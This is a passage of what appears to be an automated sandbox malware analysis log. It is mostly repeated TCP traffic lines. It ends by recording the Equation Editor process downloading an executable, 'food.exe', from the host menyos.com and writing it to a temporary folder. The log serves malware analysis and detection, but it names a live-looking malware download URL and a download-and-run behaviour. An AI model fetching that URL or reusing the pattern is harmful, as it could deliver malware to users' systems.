Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Source: global traffic

HTTP traffic detected: GET /assets/home/js/bdg/food.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: menyos.comConnection: Keep-Alive

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_036706E2 URLDownloadToFileW,

2_2_036706E2

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\food[1].exe

Jump to behavior

Source: global traffic

Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: global traffic

DNS traffic detected: DNS query: menyos.com

Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
